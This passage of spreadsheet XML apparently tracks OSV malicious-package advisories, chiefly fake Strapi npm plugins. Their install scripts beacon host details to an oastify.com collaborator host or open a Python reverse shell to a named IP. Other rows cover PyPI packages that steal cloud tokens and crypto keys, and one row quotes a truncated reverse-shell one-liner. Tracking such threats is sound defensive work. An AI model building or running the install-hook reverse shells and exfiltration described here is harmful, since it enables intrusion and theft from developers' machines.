          <t>New</t>
        </is>
      </c>
      <c r="C1690" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16234</t>
        </is>
      </c>
      <c r="D1690" s="5" t="inlineStr"/>
      <c r="E1690" s="5" t="inlineStr"/>
      <c r="F1690" s="5" t="inlineStr"/>
      <c r="G1690" s="5" t="inlineStr"/>
      <c r="H1690" s="5" t="inlineStr"/>
      <c r="I1690" s="5" t="inlineStr"/>
      <c r="J1690" s="5" t="inlineStr"/>
      <c r="K1690" s="5" t="inlineStr"/>
      <c r="L1690" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-os-rec</t>
        </is>
      </c>
      <c r="M1690" s="5" t="inlineStr"/>
      <c r="N1690" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1690" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1690" s="5" t="inlineStr"/>
      <c r="Q1690" s="5" t="inlineStr"/>
      <c r="R1690" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b7f08345375bd52a25c34cc61a3e877c1a9f8f364a90a76b3a1eff55216ea03)
postinstall.js runs automatically on npm install and collects host reconnaissance data — os.hostname(), os.platform(), os.arch(), os.type(), os.release(), the current username, and enumeration of all network interface addresses — then transmits them as query-string parameters in an HTTP GET to hardcoded host 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com on port 80 at path /osinfo. The oastify.com subdomain is a Burp Collaborator out-of-band interaction endpoint used to receive reconnaissance beacons. The behavior is undocumented, fires on default install with no user interaction, and identifies the installing machine to an attacker-controlled listener.
</t>
        </is>
      </c>
      <c r="S1690" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16234</t>
        </is>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1691" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16235</t>
        </is>
      </c>
      <c r="D1691" s="5" t="inlineStr"/>
      <c r="E1691" s="5" t="inlineStr"/>
      <c r="F1691" s="5" t="inlineStr"/>
      <c r="G1691" s="5" t="inlineStr"/>
      <c r="H1691" s="5" t="inlineStr"/>
      <c r="I1691" s="5" t="inlineStr"/>
      <c r="J1691" s="5" t="inlineStr"/>
      <c r="K1691" s="5" t="inlineStr"/>
      <c r="L1691" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-osag</t>
        </is>
      </c>
      <c r="M1691" s="5" t="inlineStr"/>
      <c r="N1691" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1691" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1691" s="5" t="inlineStr"/>
      <c r="Q1691" s="5" t="inlineStr"/>
      <c r="R1691" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (34d9349a970008e54774fc533af589248d578e1d34f6f82a9a6630beeabd2203)
The package presents itself as a Strapi plugin but ships no plugin code — only a postinstall.js script that runs automatically on `npm install`. The script collects installer-side host identifiers (hostname, OS platform/arch/type/release, username, home directory) and enumerates all network interface addresses, then transmits them as query parameters in a plain HTTP GET to a hardcoded Burp Collaborator subdomain 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com on port 80. The package's declared repository/homepage points at a placeholder github.com/user/strapi-plugin-yayccresh-meeb URL that does not identify a real publisher, and the Strapi-branded name does not match the shipped contents.
</t>
        </is>
      </c>
      <c r="S1691" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16235</t>
        </is>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1692" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16236</t>
        </is>
      </c>
      <c r="D1692" s="5" t="inlineStr"/>
      <c r="E1692" s="5" t="inlineStr"/>
      <c r="F1692" s="5" t="inlineStr"/>
      <c r="G1692" s="5" t="inlineStr"/>
      <c r="H1692" s="5" t="inlineStr"/>
      <c r="I1692" s="5" t="inlineStr"/>
      <c r="J1692" s="5" t="inlineStr"/>
      <c r="K1692" s="5" t="inlineStr"/>
      <c r="L1692" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-perev-meeb</t>
        </is>
      </c>
      <c r="M1692" s="5" t="inlineStr"/>
      <c r="N1692" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1692" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1692" s="5" t="inlineStr"/>
      <c r="Q1692" s="5" t="inlineStr"/>
      <c r="R1692" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (29840a9eddc4894177d910b38ef1808c0ba7a402c267160fe8e86cff48873700)
The npm postinstall hook executes postinstall.js, which uses child_process to spawn a Python reverse shell that connects to the hardcoded remote host 14.225.210.85:80 and dup2's a PTY-backed /bin/sh over the socket, giving the operator of that host an interactive shell on the installer's machine. Execution is gated by a hostname allowlist check (os.hostname() === 'ubuntu-fc-uvm'), a target-restriction technique that keeps the payload dormant on unintended hosts (scanners, sandboxes) and only detonates on the intended victim. The package presents itself as a Strapi plugin but ships no plugin functionality relevant to the postinstall behavior; the postinstall is the payload.
</t>
        </is>
      </c>
      <c r="S1692" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16236</t>
        </is>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1693" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16237</t>
        </is>
      </c>
      <c r="D1693" s="5" t="inlineStr"/>
      <c r="E1693" s="5" t="inlineStr"/>
      <c r="F1693" s="5" t="inlineStr"/>
      <c r="G1693" s="5" t="inlineStr"/>
      <c r="H1693" s="5" t="inlineStr"/>
      <c r="I1693" s="5" t="inlineStr"/>
      <c r="J1693" s="5" t="inlineStr"/>
      <c r="K1693" s="5" t="inlineStr"/>
      <c r="L1693" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-persh-meeb</t>
        </is>
      </c>
      <c r="M1693" s="5" t="inlineStr"/>
      <c r="N1693" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1693" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1693" s="5" t="inlineStr"/>
      <c r="Q1693" s="5" t="inlineStr"/>
      <c r="R1693" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (67ce68eeb9a309b5fff512e24a1b8f4c12fb171c0752d6a04293a4e72c805088)
strapi-plugin-persh-meeb@3.6.8 ships a postinstall.js (also declared as the package `main`) that runs automatically on `npm install`. The script spawns a Python one-liner that opens a TCP socket to the hardcoded bare IP 14.225.210.85 on port 443 (with:80 also referenced), duplicates the socket over stdio, and calls `pty.spawn("sh")`, giving the remote host an interactive shell on the installer's machine. Retries up to 5 times at 10-second intervals. Execution is gated by a hostname allowlist check (`os.hostname() === 'ubuntu-fc-uvm'`) and logs to `/tmp/postinstall-revshell.log`, consistent with a targeted red-team or victim-tuned implant. The destination is a bare IP unrelated to any Strapi or plugin-publisher infrastructure, and the package name resembles the Strapi plugin ecosystem.
</t>
        </is>
      </c>
      <c r="S1693" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16237</t>
        </is>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1694" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16238</t>
        </is>
      </c>
      <c r="D1694" s="5" t="inlineStr"/>
      <c r="E1694" s="5" t="inlineStr"/>
      <c r="F1694" s="5" t="inlineStr"/>
      <c r="G1694" s="5" t="inlineStr"/>
      <c r="H1694" s="5" t="inlineStr"/>
      <c r="I1694" s="5" t="inlineStr"/>
      <c r="J1694" s="5" t="inlineStr"/>
      <c r="K1694" s="5" t="inlineStr"/>
      <c r="L1694" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-portcc-meeb</t>
        </is>
      </c>
      <c r="M1694" s="5" t="inlineStr"/>
      <c r="N1694" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1694" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1694" s="5" t="inlineStr"/>
      <c r="Q1694" s="5" t="inlineStr"/>
      <c r="R1694" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5f04ef6b35ce447e6825a520a88eda4fe27ebfe6214648906db673e7d57ea86b)
Package advertises itself as a Strapi plugin but ships no plugin functionality; the entire payload is postinstall.js, which is also declared as the package `main`. On install, postinstall.js checks os.hostname() against 'ubuntu-fc-uvm' and then invokes child_process.exec on an inline python3 one-liner that opens a TCP socket to the hardcoded remote host 14.225.210.85:80, dups the socket onto stdin/stdout/stderr, and calls pty.spawn('sh'), yielding an interactive reverse shell on the installer's machine. A retry loop attempts up to five reconnects. The hostname gate is a targeting/anti-analysis check, not a safety limit. The package name and Strapi-plugin framing are a cover story; no legitimate plugin code is present.
</t>
        </is>
      </c>
      <c r="S1694" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16238</t>
        </is>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1695" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16239</t>
        </is>
      </c>
      <c r="D1695" s="5" t="inlineStr"/>
      <c r="E1695" s="5" t="inlineStr"/>
      <c r="F1695" s="5" t="inlineStr"/>
      <c r="G1695" s="5" t="inlineStr"/>
      <c r="H1695" s="5" t="inlineStr"/>
      <c r="I1695" s="5" t="inlineStr"/>
      <c r="J1695" s="5" t="inlineStr"/>
      <c r="K1695" s="5" t="inlineStr"/>
      <c r="L1695" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-pysh-meeb</t>
        </is>
      </c>
      <c r="M1695" s="5" t="inlineStr"/>
      <c r="N1695" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1695" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1695" s="5" t="inlineStr"/>
      <c r="Q1695" s="5" t="inlineStr"/>
      <c r="R1695" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (188e8ecd93a0124135c178af848914dbd0f8cc7c3f9fdc7f5137fc94e46bb27d)
strapi-plugin-pysh-meeb@3.6.8 ships a postinstall.js (also declared as the package main) that runs automatically on npm install. The script uses child_process to spawn a Python one-liner (`python3 -c 'import sys,socket,os,pty;...pty.spawn("sh")'`) which opens an outbound TCP connection to the hardcoded attacker IP 14.225.210.85:80 and hands an interactive PTY shell to the remote endpoint, giving full remote code execution on the installer's host. Detonation is gated by an os.hostname() equality check against 'ubuntu-fc-uvm', a targeting/evasion mechanism that suppresses the payload on other hosts while firing on the intended victim; retry logic is present to re-establish the connection. Package metadata is consistent with a typosquat dropper: the name mimics a Strapi plugin, the repository URL uses a placeholder 'user' org and a mismatched slug (strapi-plugin-yayccresh-meeb), and the description is a generic 'Strapi plugin for enhanced functionality'. No legitimate plugin functionality is shipped.
</t>
        </is>
      </c>
      <c r="S1695" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16239</t>
        </is>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1696" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16240</t>
        </is>
      </c>
      <c r="D1696" s="5" t="inlineStr"/>
      <c r="E1696" s="5" t="inlineStr"/>
      <c r="F1696" s="5" t="inlineStr"/>
      <c r="G1696" s="5" t="inlineStr"/>
      <c r="H1696" s="5" t="inlineStr"/>
      <c r="I1696" s="5" t="inlineStr"/>
      <c r="J1696" s="5" t="inlineStr"/>
      <c r="K1696" s="5" t="inlineStr"/>
      <c r="L1696" s="5" t="inlineStr">
        <is>
          <t>PyPI:praetorian-mind-rce-test-2026</t>
        </is>
      </c>
      <c r="M1696" s="5" t="inlineStr"/>
      <c r="N1696" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1696" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1696" s="5" t="inlineStr"/>
      <c r="Q1696" s="5" t="inlineStr"/>
      <c r="R1696" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (f9a677a1b1a8762a3f01e91a8da196298bf146b255dc7f9d834842916882372b)
During installation, package exfiltrates environment variables, tokens from cloud environments and fingerprints the environment. It identifies itself as a security testing engagement.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-praetorian-mind-rce-test-2026
Reasons (based on the campaign):
 - exfiltration-env-variables
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - exfiltration-cloud-tokens
## Source: ossf-package-analysis (48d3d63e8f3773e745ea3c4961c8d598e880db130cf063cc738a381080c2b782)
The OpenSSF Package Analysis project identified 'praetorian-mind-rce-test-2026' @ 0.0.2 (pypi) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
</t>
        </is>
      </c>
      <c r="S1696" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16240</t>
        </is>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1697" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16241</t>
        </is>
      </c>
      <c r="D1697" s="5" t="inlineStr"/>
      <c r="E1697" s="5" t="inlineStr"/>
      <c r="F1697" s="5" t="inlineStr"/>
      <c r="G1697" s="5" t="inlineStr"/>
      <c r="H1697" s="5" t="inlineStr"/>
      <c r="I1697" s="5" t="inlineStr"/>
      <c r="J1697" s="5" t="inlineStr"/>
      <c r="K1697" s="5" t="inlineStr"/>
      <c r="L1697" s="5" t="inlineStr">
        <is>
          <t>PyPI:rak-lab-yoav-orca-zrktd2cp5hjmo4x7</t>
        </is>
      </c>
      <c r="M1697" s="5" t="inlineStr"/>
      <c r="N1697" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1697" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1697" s="5" t="inlineStr"/>
      <c r="Q1697" s="5" t="inlineStr"/>
      <c r="R1697" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (ee8eb9dfebb1388345acb8b7185f69adcf072f02ea058bc3d64a81e91733b5d0)
Package appears to be internal test of dependency confusion.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research &amp; co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="S1697" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16241</t>
        </is>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1698" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16242</t>
        </is>
      </c>
      <c r="D1698" s="5" t="inlineStr"/>
      <c r="E1698" s="5" t="inlineStr"/>
      <c r="F1698" s="5" t="inlineStr"/>
      <c r="G1698" s="5" t="inlineStr"/>
      <c r="H1698" s="5" t="inlineStr"/>
      <c r="I1698" s="5" t="inlineStr"/>
      <c r="J1698" s="5" t="inlineStr"/>
      <c r="K1698" s="5" t="inlineStr"/>
      <c r="L1698" s="5" t="inlineStr">
        <is>
          <t>PyPI:trongappy</t>
        </is>
      </c>
      <c r="M1698" s="5" t="inlineStr"/>
      <c r="N1698" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1698" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1698" s="5" t="inlineStr"/>
      <c r="Q1698" s="5" t="inlineStr"/>
      <c r="R1698" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (91ef2777a3657922888663423a9cadfbad9e4366473b5c7c4e03a7608e49fa36)
Package appears to be designed for private key exfiltration, but no known usage. The name appears to be related to the cryptocurrency TRX (Tron / Tronix). Some packages additionally clone the readme of other, legit libraries. The similar packages are repeating uploaded to PyPI
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2025-04-tronix
Reasons (based on the campaign):
 - exfiltration-generic
 - crypto-related
</t>
        </is>
      </c>
      <c r="S1698" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16242</t>
        </is>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1699" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16243</t>
        </is>
      </c>
      <c r="D1699" s="5" t="inlineStr"/>
      <c r="E1699" s="5" t="inlineStr"/>
      <c r="F1699" s="5" t="inlineStr"/>
      <c r="G1699" s="5" t="inlineStr"/>
      <c r="H1699" s="5" t="inlineStr"/>
      <c r="I1699" s="5" t="inlineStr"/>
      <c r="J1699" s="5" t="inlineStr"/>
      <c r="K1699" s="5" t="inlineStr"/>
      <c r="L1699" s="5" t="inlineStr">
        <is>
          <t>npm:idx_form_script</t>
        </is>
      </c>
      <c r="M1699" s="5" t="inlineStr"/>
      <c r="N1699" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1699" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1699" s="5" t="inlineStr"/>
      <c r="Q1699" s="5" t="inlineStr"/>
      <c r="R1699" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (59d074c4d6bd941d9586764043d556a83d301711c58eb661d57d63fa06ebec60)
The OpenSSF Package Analysis project identified 'idx_form_script' @ 999.0.4 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="S1699" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16243</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S1699"/>
  <conditionalFormatting sqref="E2:E1699">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1699">
    <cfRule type="cellIs" priority="5" operator="equal" dxfId="4">
      <formula>"Yes"</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2" r:id="rId1"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S3" r:id="rId2"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S4" r:id="rId3"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S5" r:id="rId4"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S6" r:id="rId5"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S7" r:id="rId6"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S8" r:id="rId7"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S9" r:id="rId8"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S10" r:id="rId9"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S11" r:id="rId10"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S12" r:id="rId11"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S13" r:id="rId12"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S14" r:id="rId13"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S15" r:id="rId14"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S16" r:id="rId15"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S17" r:id="rId16"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S18" r:id="rId17"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S19" r:id="rId18"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S20" r:id="rId19"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S21" r:id="rId20"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S22" r:id="rId21"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S23" r:id="rId22"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S24" r:id="rId23"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S25" r:id="rId24"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S26" r:id="rId25"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S27" r:id="rId26"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S28" r:id="rId27"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S29" r:id="rId28"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S30" r:id="rId29"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S31" r:id="rId30"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S32" r:id="rId31"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S33" r:id="rId32"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S34" r:id="rId33"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S35" r:id="rId34"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S36" r:id="rId35"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S37" r:id="rId36"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S38" r:id="rId37"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S39" r:id="rId38"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S40" r:id="rId39"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S41" r:id="rId40"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S42" r:id="rId41"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S43" r:id="rId42"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S44" r:id="rId43"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S45" r:id="rId44"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S46" r:id="rId45"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S47" r:id="rId46"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S48" r:id="rId47"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S49" r:id="rId48"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S50" r:id="rId49"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S51" r:id="rId50"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S52" r:id="rId51"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S53" r:id="rId52"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S54" r:id="rId53"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S55" r:id="rId54"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S56" r:id="rId55"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S57" r:id="rId56"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S58" r:id="rId57"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S59" r:id="rId58"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S60" r:id="rId59"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S61" r:id="rId60"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S62" r:id="rId61"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S63" r:id="rId62"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S64" r:id="rId63"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S65" r:id="rId64"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S66" r:id="rId65"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S67" r:id="rId66"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S68" r:id="rId67"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S69" r:id="rId68"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S70" r:id="rId69"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S71" r:id="rId70"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S72" r:id="rId71"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S73" r:id="rId72"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S74" r:id="rId73"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S75" r:id="rId74"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S76" r:id="rId75"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S77" r:id="rId76"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S78" r:id="rId77"/>
